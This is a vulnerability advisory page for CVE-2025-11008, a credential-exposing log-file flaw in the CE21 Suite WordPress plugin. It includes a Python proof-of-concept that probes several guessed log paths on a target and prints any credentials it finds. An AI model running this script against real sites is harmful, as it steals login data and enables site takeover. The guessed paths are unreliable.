Security Vulnerability Report
中文
CVE-2025-11008 CVSS 9.8 CRITICAL

CVE-2025-11008

Published: 2025-11-04 04:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The CE21 Suite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.1 via the log file. This makes it possible for unauthenticated attackers to extract sensitive data including authentication credentials, which can be used to log in as other users as long as they have used the plugin's custom authentication feature before. This may include administrators, which makes a complete site takeover possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CE21 Suite WordPress Plugin <= 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-11008 PoC - CE21 Suite Log File Information Disclosure # Target: WordPress site with CE21 Suite plugin <= 2.3.1 target_url = "http://target-wordpress-site.com" # Common log file paths that CE21 Suite might create log_paths = [ "/wp-content/plugins/ce21-suite/logs/auth.log", "/wp-content/plugins/ce21-suite/logs/ce21.log", "/wp-content/uploads/ce21/logs/auth.log", "/wp-content/uploads/ce21.log" ] def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-11008""" for path in log_paths: url = f"{target_url}{path}" try: response = requests.get(url, timeout=10) if response.status_code == 200: # Check if response contains authentication credentials content = response.text.lower() if 'password' in content or 'credential' in content or 'auth' in content: print(f"[+] Vulnerable! Log file found: {url}") print(f"[+] Exposed content preview:") print(response.text[:500]) return True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") return False if __name__ == "__main__": print("CVE-2025-11008 - CE21 Suite Information Disclosure PoC") print("=" * 60) if check_vulnerability(): print("[+] Target is VULNERABLE") else: print("[-] Target may not be vulnerable or log file not found")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11008", "sourceIdentifier": "[email protected]", "published": "2025-11-04T04:15:37.113", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CE21 Suite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.1 via the log file. This makes it possible for unauthenticated attackers to extract sensitive data including authentication credentials, which can be used to log in as other users as long as they have used the plugin's custom authentication feature before. This may include administrators, which makes a complete site takeover possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://wordpress.org/plugins/ce21-suite/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91aa86d9-8e42-4deb-b6ca-c3b388fefcb1?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.